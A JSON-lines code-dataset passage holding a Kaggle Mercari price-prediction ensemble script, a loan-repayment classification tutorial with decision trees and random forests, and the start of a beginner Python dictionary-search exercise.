row_nonzeros,\n out=np.full(shape=row_sum.shape, fill_value=np.nan),\n where=(row_nonzeros > 0))\n return row_mean\n\n\ndef create_ngram_price_mean_(dataset, column, min_df, max_df, ngram_range):\n timer = Timer(column + '_ngram_price_mean')\n timer.print('Start')\n\n vec = CountVectorizer(\n min_df=min_df,\n max_df=max_df,\n ngram_range=ngram_range,\n token_pattern=r\"(?u)\\b\\w+\\b\",\n stop_words='english',\n binary=True\n )\n texts = dataset[column].map(preprocess)\n count_matrix = vec.fit_transform(texts[dataset['for_train']])\n timer.print('Fitted')\n all_count_matrix = vec.transform(texts)\n timer.print('Transformed')\n\n term_df = np.asarray(count_matrix.sum(axis=0)).reshape(-1)\n assert term_df.shape[0] == count_matrix.shape[1]\n\n log1p_price = dataset.loc[dataset['for_train'], 'log1p_price'].values\n log1p_price_matrix = count_matrix.multiply(log1p_price.reshape(-1, 1))\n term_log1p_price_mean = np.asarray(log1p_price_matrix.sum(axis=0)).reshape(-1) / term_df\n\n term_log1p_price_mean_squared = np.asarray(log1p_price_matrix.power(2).sum(axis=0)).reshape(-1) / term_df\n term_log1p_price_var = np.maximum(1e-6, term_log1p_price_mean_squared - term_log1p_price_mean ** 2)\n\n features_df = pd.DataFrame()\n bins = 20\n _, seps = pd.qcut(term_log1p_price_var, bins, duplicates='drop', labels=False, retbins=True)\n for i in range(len(seps) - 1):\n lower, upper = seps[i], seps[i + 1]\n selector = (lower <= term_log1p_price_var) & (term_log1p_price_var < upper)\n # print('[lower, upper): {:4.3f} {:4.3f}'.format(lower, upper))\n\n #\n selected_term_mean = np.where(selector, term_log1p_price_mean, 0)\n selected_mean_matrix = all_count_matrix.multiply(scipy.sparse.csc_matrix(selected_term_mean))\n price_mean_mean = calculate_each_row_mean(selected_mean_matrix)\n\n # #\n # terms = selected_mean_matrix.getnnz(axis=1)\n #\n # #\n # price_mean_var = calculate_each_row_mean(selected_mean_matrix.power(2)) - price_mean_mean ** 2\n\n #\n selected_term_df = np.where(selector, term_df, 0)\n selected_df_matrix = all_count_matrix.multiply(scipy.sparse.csc_matrix(selected_term_df))\n df_mean = calculate_each_row_mean(selected_df_matrix)\n\n features_df['{}_price_mean_mean_{}'.format(column, i)] = price_mean_mean\n # features_df['{}_price_mean_var_{}'.format(column, i)] = price_mean_var\n # features_df['{}_terms_{}'.format(column, i)] = terms\n # features_df['{}_df_mean_{}'.format(column, i)] = df_mean\n\n timer.print('Done')\n return features_df\n\n\ndef create_ngram_price_mean(dataset, column, min_df, max_df, ngram_range):\n\n features_df = create_ngram_price_mean_(dataset, column, min_df, max_df, ngram_range)\n\n feature_names = []\n features = []\n for c in features_df.columns:\n feature_names.append(c)\n features.append(features_df[c].values.reshape(-1, 1))\n\n # nan or 0 ??\n f = scipy.sparse.csr_matrix(np.hstack(features))\n\n assert f.shape == (dataset.shape[0], len(feature_names))\n return Feature(feature_names, f)\n\n\n# TODO tol, alpha調整\ndef train_ridge_model(train_X, train_y):\n ridge = Ridge(alpha=16.8, solver='sag', copy_X=False, fit_intercept=True, tol=0.01, max_iter=100,\n random_state=114514)\n ridge.fit(train_X, train_y)\n return ridge\n\n\ndef do_ridge_global(train_index):\n global g_all_train_X, g_all_train_y\n model = train_ridge_model(g_all_train_X[train_index], g_all_train_y[train_index])\n return model\n\n\ndef create_ridge_predict_stacking_feature(dataset, common_features: List[Feature]):\n timer = Timer('ridge_predict')\n timer.print('Start')\n gc.collect()\n\n train_size = dataset[dataset['for_train']].shape[0]\n\n train_one_hot_like_features = create_one_hot_like_features(common_features, 0, train_size, train_size, verbose=True)\n gc.collect()\n assert train_one_hot_like_features.shape[0] == train_size\n print(train_one_hot_like_features.shape)\n timer.print('Created one hot like features for train')\n\n global g_all_train_X, g_all_train_y\n g_all_train_X = train_one_hot_like_features\n g_all_train_y = dataset['log1p_price'][:train_size].values\n\n gc.collect()\n kf = KFold(n_splits=8, shuffle=True, random_state=810)\n models = Parallel(n_jobs=4, max_nbytes=None)(\n delayed(do_ridge_global)(train_index)\n for train_index, _ in kf.split(train_one_hot_like_features)\n )\n del g_all_train_X, g_all_train_y\n gc.collect()\n timer.print('Trained')\n\n preds = np.full(dataset.shape[0], -114514, dtype=np.float64)\n for i, (train_index, valid_index) in enumerate(kf.split(train_one_hot_like_features)):\n preds[valid_index] = models[i].predict(train_one_hot_like_features[valid_index])\n gc.collect()\n del train_one_hot_like_features\n gc.collect()\n timer.print('Predicted valid')\n\n test_size = dataset.shape[0] - train_size\n test_batches = 5\n test_batch_size = test_size // test_batches + 1\n for batch_i in range(test_batches):\n gc.collect()\n start = train_size + test_batch_size * batch_i\n end = train_size + min(test_size, test_batch_size * (batch_i + 1))\n test_X = create_one_hot_like_features(common_features, start, end, train_size)\n\n predss = []\n for model in models:\n predss.append(model.predict(test_X))\n preds[start:end] = np.mean(np.hstack([preds.reshape(-1, 1) for preds in predss]), axis=1)\n gc.collect()\n timer.print('Predicted test')\n\n print('total loss: ', rmse(preds[:train_size], dataset['log1p_price'][:train_size].values))\n timer.print('Trained ridge models')\n\n return Feature('ridge_pred', preds.reshape(dataset.shape[0], 1))\n\n\nimport copy\nimport fastFM.als\n\n\ndef do_single_fm(train_X, train_y, valid_X, valid_y, l2_reg_V=600):\n train_i = 0\n timer = Timer('fm_{}'.format(train_i))\n timer.print('Start')\n\n model = fastFM.als.FMRegression(n_iter=0, init_stdev=0.0001, rank=8, l2_reg_w=20, l2_reg_V=l2_reg_V)\n model.fit(train_X, train_y)\n train_loss = rmse(model.predict(train_X), train_y)\n valid_loss = rmse(model.predict(valid_X), valid_y)\n\n train_losses = [train_loss]\n valid_losses = [valid_loss]\n for iter_i in range(10):\n prev_model = copy.deepcopy(model)\n\n model.fit(train_X, train_y, n_more_iter=1)\n timer.print('Fitted')\n\n train_loss = rmse(model.predict(train_X), train_y)\n valid_loss = rmse(model.predict(valid_X), valid_y)\n timer.print('Predicted')\n\n train_losses.append(train_loss)\n valid_losses.append(valid_loss)\n timer.print('loss {} / iter {:2d}: {:7.5f}, {:7.5f}'.format(train_i, iter_i, train_loss, valid_loss))\n\n if valid_loss > valid_losses[-2]:\n model = prev_model\n break\n\n train_loss = rmse(model.predict(train_X), train_y)\n valid_loss = rmse(model.predict(valid_X), valid_y)\n print('loss {}: {}, {}'.format(train_i, train_loss, valid_loss))\n timer.print('Done')\n\n return model\n\n\ndef create_fm_predict_stacking_feature(dataset, common_features: List[Feature]):\n timer = Timer('fm_predict')\n timer.print('Start')\n\n train_size = dataset[dataset['for_train']].shape[0]\n\n one_hot_like_features = create_one_hot_like_features(common_features, 0, dataset.shape[0], train_size)\n assert one_hot_like_features.shape[0] == dataset.shape[0]\n print(one_hot_like_features.shape)\n timer.print('Created one hot like features')\n\n all_train_X = one_hot_like_features[:train_size]\n all_train_y = dataset['log1p_price'][:train_size].values\n\n models = []\n preds = np.full(dataset.shape[0], -114514, dtype=np.float64)\n kf = KFold(n_splits=8, shuffle=True, random_state=810)\n for train_i, (train_index, valid_index) in enumerate(kf.split(all_train_X)):\n train_X, valid_X = all_train_X[train_index], all_train_X[valid_index]\n train_y, valid_y = all_train_y[train_index], all_train_y[valid_index]\n\n model = do_single_fm(train_X, train_y, valid_X, valid_y)\n\n valid_preds = model.predict(valid_X)\n preds[valid_index] = valid_preds\n\n print('loss {}:'.format(train_i), rmse(valid_preds, valid_y))\n\n models.append(model)\n\n timer.print('Trained fm model {}'.format(train_i))\n\n print('total loss: ', rmse(preds[:train_size], all_train_y))\n\n test_X = one_hot_like_features[train_size:]\n preds[train_size:] = np.mean(np.hstack([model.predict(test_X).reshape(test_X.shape[0], 1) for model in models]), axis=1)\n timer.print('Trained fm models')\n\n return Feature('fm_pred', preds.reshape(dataset.shape[0], 1))\n\n\nimport keras\nimport keras.preprocessing.text\nfrom keras.layers import Conv1D, GlobalMaxPooling1D, BatchNormalization\nfrom keras.layers import Input, Embedding, Dropout, Dense, Flatten\nfrom keras import backend as K\nimport tensorflow as tf\n\nmaxlen_desc = 100\nmaxlen_name = 13\n\n\ndef build_cnn(\n num_words, maxlen_name, maxlen_desc, num_categories1, num_categories2, num_categories3,\n num_brand_names, num_item_conditions, additional_feature_names,\n hyper_params\n):\n input_desc = Input((maxlen_desc,), name='desc')\n embedding_layer_desc = Embedding(num_words, hyper_params['desc_embedding'])\n embedding_desc = embedding_layer_desc(input_desc)\n\n input_name = Input((maxlen_name,), name='name')\n embedding_layer_name = Embedding(num_words, hyper_params['name_embedding'])\n embedding_name = embedding_layer_name(input_name)\n\n input_category1 = Input((1,), name='category1')\n input_category2 = Input((1,), name='category2')\n input_category3 = Input((1,), name='category3')\n embedding_category1 = Embedding(num_categories1, hyper_params['category1_embedding'])(input_category1)\n embedding_category2 = Embedding(num_categories2, hyper_params['category2_embedding'])(input_category2)\n embedding_category3 = Embedding(num_categories3, hyper_params['category3_embedding'])(input_category3)\n\n input_brand_name = Input((1,), name='brand_name')\n embedding_brand_name = Embedding(num_brand_names, hyper_params['brand_name_embedding'])(input_brand_name)\n\n input_item_condition = Input((1,), name='item_condition')\n embedding_item_condition = Embedding(num_item_conditions, 2)(input_item_condition)\n\n input_shipping = Input((1,), name='shipping')\n embedding_shipping = Embedding(2, 1)(input_shipping)\n\n cnn_desc = Conv1D(filters=hyper_params['desc_filters'], kernel_size=3, activation='relu')(embedding_desc)\n cnn_desc = GlobalMaxPooling1D()(cnn_desc)\n dense_desc = cnn_desc\n\n cnn_name = Conv1D(filters=hyper_params['name_filters'], kernel_size=3, activation='relu')(embedding_name)\n cnn_name = GlobalMaxPooling1D()(cnn_name)\n dense_name = cnn_name\n\n numerical_feature_names = [\n 'name_len',\n 'desc_len',\n 'name_count_words',\n 'desc_count_words',\n 'category1_mean',\n 'category2_mean',\n\n *additional_feature_names\n ]\n numerical_feature_inputs = [Input((1,), name=feature_name) for feature_name in numerical_feature_names]\n\n x = keras.layers.concatenate([\n dense_desc,\n dense_name,\n Flatten()(embedding_category1),\n Flatten()(embedding_category2),\n Flatten()(embedding_category3),\n Flatten()(embedding_brand_name),\n Flatten()(embedding_item_condition),\n Flatten()(embedding_shipping),\n\n *numerical_feature_inputs\n ])\n\n x = BatchNormalization()(x)\n x = Dropout(hyper_params['dropout0'])(Dense(hyper_params['dense0'], activation='relu')(x))\n x = BatchNormalization()(x)\n x = Dropout(hyper_params['dropout1'])(Dense(hyper_params['dense1'], activation='relu')(x))\n x = BatchNormalization()(x)\n output = Dense(1, activation='linear')(x)\n\n model = keras.Model(\n [\n input_desc,\n input_name,\n input_category1,\n input_category2,\n input_category3,\n input_brand_name,\n input_item_condition,\n input_shipping,\n\n *numerical_feature_inputs\n ],\n output)\n model.compile(loss='mse', optimizer=keras.optimizers.Adam())\n return model\n\n\ndef to_seqs(tokenizer, texts, maxlen):\n return keras.preprocessing.sequence.pad_sequences(tokenizer.texts_to_sequences(texts), maxlen=maxlen,\n truncating='post')\n\n\ndef convert_to_input(tokenizer, dataset, additional_feature_dict):\n timer = Timer('convert_to_input')\n timer.print('Start')\n\n batches = 4\n batch_size = dataset.shape[0] // batches + 1\n\n name = np.concatenate(\n Parallel(n_jobs=4)(\n delayed(to_seqs)(tokenizer, name_batch, maxlen_name)\n for name_batch in [dataset.name[batch_size * i:batch_size * (i + 1)].values for i in range(batches)]\n )\n )\n gc.collect()\n timer.print('Done name')\n\n desc = np.concatenate(\n Parallel(n_jobs=4)(\n delayed(to_seqs)(tokenizer, desc_batch, maxlen_desc)\n for desc_batch in [dataset.item_description[batch_size * i:batch_size * (i + 1)].values for i in range(batches)]\n )\n )\n gc.collect()\n timer.print('Done desc')\n\n category1 = LabelEncoder().fit_transform(dataset['category1']).reshape(dataset.shape[0], 1)\n category2 = LabelEncoder().fit_transform(dataset['category2']).reshape(dataset.shape[0], 1)\n category3 = LabelEncoder().fit_transform(dataset['category3']).reshape(dataset.shape[0], 1)\n\n brand_name = LabelEncoder().fit_transform(dataset['brand_name']).reshape(dataset.shape[0], 1)\n\n item_condition = LabelEncoder().fit_transform(dataset['item_condition_id']).reshape(dataset.shape[0], 1)\n\n shipping = LabelEncoder().fit_transform(dataset['shipping']).reshape(dataset.shape[0], 1)\n\n name_len = StandardScaler().fit_transform(dataset['name'].str.len().values.reshape(-1, 1))\n desc_len = StandardScaler().fit_transform(dataset['item_description'].str.len().values.reshape(-1, 1))\n name_count_words = StandardScaler().fit_transform(dataset['name'].str.count(' ').values.reshape(-1, 1))\n desc_count_words = StandardScaler().fit_transform(dataset['item_description'].str.count(' ').values.reshape(-1, 1))\n\n category1_mean = dataset['category1'].map(dataset.groupby('category1')['log1p_price'].mean()).values.reshape(-1, 1)\n category2_mean = dataset['category2'].map(dataset.groupby('category2')['log1p_price'].mean()).values.reshape(-1, 1)\n\n timer.print('Almost done')\n\n keras_input = {\n 'name': name,\n 'desc': desc,\n 'category1': category1,\n 'category2': category2,\n 'category3': category3,\n 'brand_name': brand_name,\n 'item_condition': item_condition,\n 'shipping': shipping,\n\n 'name_len': name_len,\n 'desc_len': desc_len,\n 'name_count_words': name_count_words,\n 'desc_count_words': desc_count_words,\n\n 'category1_mean': category1_mean,\n 'category2_mean': category2_mean,\n\n **additional_feature_dict\n }\n print(list(keras_input.keys()))\n for vals in keras_input.values():\n assert vals.shape[0] == dataset.shape[0]\n return keras_input\n\n\ndef create_keras_input_etc(dataset):\n timer = Timer('keras')\n\n # TODO: only train?\n tokenizer = keras.preprocessing.text.Tokenizer()\n tokenizer.fit_on_texts(\n dataset[dataset['for_train']]['item_description'].tolist() +\n dataset[dataset['for_train']]['name'].tolist()\n )\n gc.collect()\n timer.print('Tokenized')\n\n num_words = len(tokenizer.word_index) + 1 # +1 is for padding\n num_brand_names = dataset['brand_name'].unique().size\n num_item_conditions = dataset['item_condition_id'].unique().size\n\n num_categories1 = dataset['category1'].unique().size\n num_categories2 = dataset['category2'].unique().size\n num_categories3 = dataset['category3'].unique().size\n\n timer.print('Prepared dataset')\n\n ##\n f = create_ngram_price_mean_(dataset, 'name', min_df=30, max_df=10000, ngram_range=(1, 3))\n f.fillna(dataset['log1p_price'].mean(), inplace=True)\n\n features_dict = {}\n for c in f.columns:\n features_dict[c] = StandardScaler().fit_transform(f[c].values.reshape(-1, 1)).reshape(-1, 1)\n timer.print('Created additional features')\n\n keras_input = convert_to_input(tokenizer, dataset, additional_feature_dict=features_dict)\n timer.print('Converted to keras input')\n\n info_to_build_nn = {\n 'num_words': num_words,\n 'maxlen_name': maxlen_name,\n 'maxlen_desc': maxlen_desc,\n 'num_categories1': num_categories1,\n 'num_categories2': num_categories2,\n 'num_categories3': num_categories3,\n 'num_brand_names': num_brand_names,\n 'num_item_conditions': num_item_conditions,\n 'additional_feature_names': list(features_dict.keys()),\n }\n\n return {\n 'keras_input': keras_input,\n 'info_to_build_nn': info_to_build_nn,\n }\n\n\ndef do_keras(dataset):\n keras_input_etc = create_keras_input_etc(dataset)\n keras_input = keras_input_etc['keras_input']\n info_to_build_nn = keras_input_etc['info_to_build_nn']\n\n def slice_keras_input(keras_input, begin, end):\n return {input_name: data[begin:end] for input_name, data in keras_input.items()}\n\n train_size = dataset[dataset['for_train']].shape[0]\n valid_size = dataset[dataset['labeled'] & ~dataset['for_train']].shape[0]\n\n train_y = dataset['log1p_price'][:train_size].values\n valid_y = dataset['log1p_price'][train_size:train_size + valid_size]\n\n train_input = slice_keras_input(keras_input, 0, train_size)\n valid_input = slice_keras_input(keras_input, train_size, train_size + valid_size)\n test_input = slice_keras_input(keras_input, train_size + valid_size, dataset.shape[0])\n\n hyper_params = {'batch_size': 2400,\n 'brand_name_embedding': 64,\n 'category1_embedding': 4,\n 'category2_embedding': 16,\n 'category3_embedding': 64,\n 'dense0': 610,\n 'dense1': 4,\n 'desc_embedding': 8,\n 'desc_filters': 32,\n 'dropout0': 0.41489440606260775,\n 'dropout1': 0.004588996677574161,\n 'lr0': 0.01100919733836959,\n 'lr1': 0.0004210931494001088,\n 'lr2': 0.0025172435657187654,\n 'name_embedding': 16,\n 'name_filters': 64}\n\n with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=4)) as sess:\n K.set_session(sess)\n\n model = build_cnn(hyper_params=hyper_params, **info_to_build_nn)\n\n lr_table = [hyper_params['lr0'], hyper_params['lr1'], hyper_params['lr2']]\n model.fit(\n train_input, train_y,\n validation_data=(valid_input, valid_y),\n batch_size=hyper_params['batch_size'],\n epochs=len(lr_table),\n callbacks=[LearningRateScheduler(lambda episode_i: lr_table[episode_i])]\n )\n\n valid_preds = model.predict(valid_input, batch_size=2048).reshape(-1)\n test_preds = model.predict(test_input, batch_size=2048).reshape(-1)\n\n del model\n gc.collect()\n\n print(rmse(valid_preds, valid_y))\n\n return {\n 'valid_preds': valid_preds,\n 'test_preds': test_preds\n }\n\n\ndef create_lgb_feature(features: List[Feature], start, end):\n lgb_features = []\n categorical_feature_indices = []\n\n index = 0\n for feature in features:\n gc.collect()\n lgb_feature = feature.get_lgb_features()[start:end]\n lgb_features.append(lgb_feature)\n\n if feature.get_feature_type() == FeatureType.CATEGORICAL:\n categorical_feature_indices.extend([index + i for i in range(lgb_feature.shape[1])])\n\n index += lgb_feature.shape[1]\n gc.collect()\n\n lgb_features = scipy.sparse.hstack(lgb_features, dtype=np.float64).tocsr()\n print('lgb_features.shape:', lgb_features.shape)\n gc.collect()\n\n # TODO: comment out\n assert lgb_features.shape[0] == end - start\n\n return lgb_features, categorical_feature_indices\n\n\ndef train_lgb_model(dataset, features: List[Feature]):\n timer = Timer('train_lgb_model')\n timer.print('Start')\n\n train_size = dataset['for_train'].sum()\n\n train_X, categorical_feature = create_lgb_feature(features, 0, train_size)\n train_y = dataset[:train_size]['log1p_price'].values\n d_train = lgb.Dataset(train_X, train_y, categorical_feature=categorical_feature)\n del train_X, train_y, categorical_feature\n gc.collect()\n timer.print('Created Dataset')\n\n params = {\n 'application': 'regression',\n 'metric': 'RMSE',\n 'learning_rate': 0.3,\n # 'max_bin': 8192,\n 'verbosity': -1,\n 'seed': 114514,\n 'nthread': 4\n }\n model = lgb.train(\n params,\n train_set=d_train,\n # valid_sets=[d_train, d_valid],\n num_boost_round=900,\n # early_stopping_rounds=100,\n verbose_eval=100\n )\n gc.collect()\n timer.print('Trained')\n\n return model\n\n\ndef lgb_predict_test(dataset, features: List[Feature]):\n timer = Timer('lgb_predict_test')\n model = train_lgb_model(dataset, features)\n timer.print('Trained')\n\n train_size = dataset['for_train'].sum()\n test_size = dataset.shape[0] - train_size\n test_batches = 5\n test_batch_size = test_size // test_batches + 1\n\n test_preds = np.full(test_size, -114514, dtype=np.float64)\n for batch_i in range(test_batches):\n gc.collect()\n start = test_batch_size * batch_i\n end = min(test_size, test_batch_size * (batch_i + 1))\n test_X = create_lgb_feature(features, train_size + start, train_size + end)[0]\n test_preds[start:end] = model.predict(test_X)\n gc.collect()\n timer.print('Predicted test')\n\n return test_preds\n\n\ndef main():\n # price mean, different ngrams\n timer = Timer('main')\n timer.print('Start')\n\n # dataset = read_dataset(down_sampling_rate=0.001, train_size=0.9)\n dataset = read_dataset(train_size=0.999) # train_size == 1だとvalid_size == 0で死ぬ\n timer.print('Loaded dataset')\n\n keras_result = do_keras(dataset)\n gc.collect()\n timer.print('Done keras')\n\n common_features = create_features(dataset)\n timer.print('Created features')\n\n feature_hyper_params = {\n 'name_term': {\n 'min_df': 1,\n 'ngram_range': (1, 3),\n },\n 'desc_term': {\n 'min_df': 3,\n 'ngram_range': (1, 2),\n },\n }\n sparse_features = create_sparse_features(dataset, feature_hyper_params)\n gc.collect()\n timer.print('Created sparse features')\n\n common_lgb_features = common_features + sparse_features\n common_lgb_features.append(create_ngram_price_mean(dataset, 'name', min_df=30, max_df=10000, ngram_range=(1, 3)))\n timer.print('Done create_ngram_price_mean')\n gc.collect()\n\n columns_to_keep = ['for_train', 'id', 'labeled', 'log1p_price', 'price']\n columns_to_drop = [c for c in dataset.columns if c not in columns_to_keep]\n for c in columns_to_drop:\n del dataset[c]\n gc.collect()\n\n common_lgb_features.append(create_ridge_predict_stacking_feature(dataset, common_features + sparse_features))\n gc.collect()\n timer.print('Done ridge predict')\n\n # common_lgb_features.append(create_fm_predict_stacking_feature(dataset, common_features + sparse_features))\n # timer.print('Done fm predict')\n\n lgb_test_preds_ = lgb_predict_test(dataset, common_lgb_features)\n timer.print('lgb Predicted test')\n\n train_size = dataset['for_train'].sum()\n valid_size = dataset['labeled'].sum() - train_size\n lgb_valid_preds = lgb_test_preds_[:valid_size]\n\n lgb_test_preds = lgb_test_preds_[valid_size:]\n\n ensemble_valid_preds = 0.7 * lgb_valid_preds + 0.3 * keras_result['valid_preds']\n ensemble_test_preds = 0.7 * lgb_test_preds + 0.3 * keras_result['test_preds']\n\n valid_train_y = dataset[train_size:train_size + valid_size]['log1p_price'].values\n print('lgb loss:', rmse(lgb_valid_preds, valid_train_y))\n print('CNN loss:', rmse(keras_result['valid_preds'], valid_train_y))\n print('Ensemble loss:', rmse(ensemble_valid_preds, valid_train_y))\n\n submission = pd.DataFrame()\n submission['test_id'] = dataset['id'][train_size + valid_size:]\n submission['price'] = np.expm1(ensemble_test_preds) # TODO 3 clip\n submission.to_csv('submission.csv', index=False)\n timer.print('Saved submission.csv')\n\n return {\n 'lgb_valid_preds': lgb_valid_preds,\n 'keras_result': keras_result,\n 'dataset': dataset,\n\n # 'ridge_feature': ridge_feature\n }\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/mercari-price-suggestion-challenge/takapt/adjustcnnparams.py","file_name":"adjustcnnparams.py","file_ext":"py","file_size_in_byte":36259,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"25024533390","text":"# We will use lending data from 2007-2010 and try to classify and predict whether or not the borrower paid back their loan in full\n\n# Here are what the columns represent:\n# credit.policy: 1 if the customer meets the credit underwriting criteria of LendingClub.com, and 0 otherwise.\n# purpose: The purpose of the loan (takes values \"credit_card\", \"debt_consolidation\", \"educational\", \"major_purchase\", \"small_business\", and \"all_other\").\n# int.rate: The interest rate of the loan, as a proportion (a rate of 11% would be stored as 0.11). Borrowers judged by LendingClub.com to be more risky are assigned higher interest rates.\n# installment: The monthly installments owed by the borrower if the loan is funded.\n# log.annual.inc: The natural log of the self-reported annual income of the borrower.\n# dti: The debt-to-income ratio of the borrower (amount of debt divided by annual income).\n# fico: The FICO credit score of the borrower.\n# days.with.cr.line: The number of days the borrower has had a credit line.\n# revol.bal: The borrower's revolving balance (amount unpaid at the end of the credit card billing cycle).\n# revol.util: The borrower's revolving line utilization rate (the amount of the credit line used relative to total credit available).\n# inq.last.6mths: The borrower's number of inquiries by creditors in the last 6 months.\n# delinq.2yrs: The number of times the borrower had been 30+ days past due on a payment in the past 2 years.\n# pub.rec: The borrower's number of derogatory public records (bankruptcy filings, tax liens, or judgments).\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import classification_report,confusion_matrix\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import RandomizedSearchCV\n\n# Get the Data\nloans = pd.read_csv('loan_data.csv')\n\nprint(loans.head())\nprint(loans.describe())\nprint(loans.info())\n\n# Exploratory Data Analysis\n\n# histogram of two FICO distributions on top of each other, one for each credit.policy outcome\nplt.figure(figsize=(10,6))\nloans[loans['credit.policy']==1]['fico'].hist(alpha=0.5,color='blue',bins=30,label='Credit.Policy=1')\nloans[loans['credit.policy']==0]['fico'].hist(alpha=0.5,color='red',bins=30,label='Credit.Policy=0')\nplt.legend()\nplt.xlabel('FICO')\n# plt.show()\n\n# histogram of two FICO distributions on top of each other, one for each not.fully.paid outcome\nplt.figure(figsize=(10,6))\nloans[loans['not.fully.paid']==1]['fico'].hist(alpha=0.5,color='blue',bins=30,label='not.fully.paid=1')\nloans[loans['not.fully.paid']==0]['fico'].hist(alpha=0.5,color='red',bins=30,label='not.fully.paid=0')\nplt.legend()\nplt.xlabel('FICO')\n# plt.show()\n\n# countplot using seaborn showing the counts of loans by purpose, with the color hue defined by not.fully.paid\nplt.figure(figsize=(11,7))\nsns.countplot(x='purpose',hue='not.fully.paid',data=loans,palette='Set1')\n# plt.show()\n\n# jointplot to see the trend between FICO score and interest rate\nsns.jointplot(x='fico',y='int.rate',data=loans,color='purple')\n# plt.show()\n\n# lmplots to see if the trend differed between not.fully.paid and credit.policy\nplt.figure(figsize=(11,7))\nsns.lmplot(y='int.rate',x='fico',data=loans,hue='credit.policy',col='not.fully.paid',palette='Set1')\n# plt.show()\n\n# Setting up the Data\n# Categorical Features - notice the purpose is a Categorical feature\nfinal_data = pd.get_dummies(loans,columns=['purpose'],drop_first=True)\n\nprint(final_data.info())\n\n# Training and Testing Data\n# X - independent variable, features\n# y - dependent variable, target\nX = final_data.drop('not.fully.paid',axis=1)\ny = final_data['not.fully.paid']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)\n\n# Training a Decision Tree Model\nprint(\"\\n### DECISION TREE ###\\n\")\n\n# Create an instance of DecisionTreeClassifier()\ndtree = DecisionTreeClassifier()\n\n# train / fit the DecisionTreeClassifier instance\ndtree.fit(X_train,y_train)\n\n# Predict values from X_test\npredictions = dtree.predict(X_test)\n\n# Evaluate the model, pass true values and predictions to classification_report\nprint('Classifiction Report:\\n',classification_report(y_test,predictions))\nprint('\\nConfusion Matrix:\\n',confusion_matrix(y_test,predictions))\nprint(f'Model Accuracy: {dtree.score(X_test, y_test)}')\n\n# Features and their importance\n# features considered most important by the Decision Tree\nprint(\"\\nFeatures and Importance:\")\nfeat_imp = pd.DataFrame({'feature': list(X_train.columns),'importance': dtree.feature_importances_}).sort_values('importance', ascending = False)\nprint(feat_imp)\n\n\n# Random Forests\nprint(\"\\n### RANDOM FOREST ###\\n\")\n# compare the decision tree model to a random forest.\n\n# Create instance of RandomForestClassifier\nrfc = RandomForestClassifier(n_estimators=100)\n\n# train / fit the RandomForestClassifier instance\nrfc.fit(X_train, y_train)\n\n# Predict values from X_test\nrfc_pred = rfc.predict(X_test)\n\n# Evaluate the model, pass true values and predictions to classification_report\nprint('Classifiction Report:\\n',classification_report(y_test,rfc_pred))\nprint('\\nConfusion Matrix:\\n',confusion_matrix(y_test,rfc_pred))\nprint(f'Model Accuracy: {rfc.score(X_test, y_test)}')\n\n# Features and their importance\n# features considered most important by the Decision Tree\nprint(\"\\nFeatures and Importance:\")\nfeat_imp = pd.DataFrame({'feature': list(X_train.columns),'importance': rfc.feature_importances_}).sort_values('importance', ascending = False)\nprint(feat_imp)\n\n\n# Random Forest Optimization through Random Search\n# to maximize the performance of the random forest, we can perform a random search for better hyperparameters\n# This will randomly select combinations of hyperparameters from a grid,\n# evaluate them using cross validation on the training data, and return the values that perform the best\n\n# Hyperparameter grid\nparam_grid = {\n 'n_estimators': np.linspace(10, 200).astype(int),\n 'max_depth': [None] + list(np.linspace(3, 20).astype(int)),\n 'max_features': ['auto', 'sqrt', None] + list(np.arange(0.5, 1, 0.1)),\n 'max_leaf_nodes': [None] + list(np.linspace(10, 50, 500).astype(int)),\n 'min_samples_split': [2, 5, 10],\n 'bootstrap': [True, False]\n}\n\n# Estimator for use in random search\nestimator = RandomForestClassifier()\n\n# Create the random search model\nrs = RandomizedSearchCV(estimator, param_grid, n_jobs = -1,\n scoring = 'roc_auc', cv = 3,\n n_iter = 10, verbose = 1)\n\n# Fit / train RandomizedSearchCV instancce\nrs.fit(X_train, y_train)\n\nprint(f'The list of best parameters:\\n {rs.best_params_}')\n\n# Use the best model out of the RandomizedSearchCV instance\nbest_model = rs.best_estimator_\nprint('### BEST MODEL OF RANDOM FOREST ###\\n')\n\n# train / fit the best model\nbest_model.fit(X_train, y_train)\n\n# Predict values from X_test off of best_model\nbest_model_pred = best_model.predict(X_test)\n\n# Evaluate the best model, pass true values and predictions to classification_report\nprint('Classifiction Report:\\n',classification_report(y_test,best_model_pred))\nprint('\\nConfusion Matrix:\\n',confusion_matrix(y_test,best_model_pred))\nprint(f'Model Accuracy: {best_model.score(X_test, y_test)}')\n\n# Features and their importance\n# features considered most important by the Decision Tree\nprint(\"\\nFeatures and Importance:\")\nfeat_imp = pd.DataFrame({'feature': list(X_train.columns),'importance': best_model.feature_importances_}).sort_values('importance', ascending = False)\nprint(feat_imp)\n\nprint('\\nFinal Scores of different models:')\nprint(f'Decision Tree : {dtree.score(X_test, y_test)}')\nprint(f'Random Forest : {rfc.score(X_test, y_test)}')\nprint(f'Best Model by RandomizedSearchCV : {best_model.score(X_test, y_test)}')\n","repo_name":"akashpunagin/Basics-of-Machine-learning-and-Data-Science","sub_path":"DS and ML Workplace/decision_trees_and_random_forest/project_loans/loans.py","file_name":"loans.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72248330081","text":"stu_a = {\n \"name\": \"A\", \"age\": 21, \"gender\": 1, \"hometown\": \"河北\"\n}\nstu_b = {\n \"name\": \"B\", \"age\": 22, \"gender\": 0, \"hometown\": \"山东\"\n}\nstu_c = {\n \"name\": \"C\", \"age\": 20, \"gender\": 1, \"hometown\": \"安徽\"\n}\nfind_name=\"D\"\nstudents = [stu_a, stu_c, stu_c]\nfor stu in students:\n print(stu)\n if stu[\"name\"] == \"A\":\n print(\"找到了%s\" % stu[\"name\"])\n stu[\"name\"] =={\"D\"} #没有改变原来的stu_a\n break;\nelse:\n #如果希望在搜索列表时,所有的字典检查之后,都没有发现需要搜索的目标\n 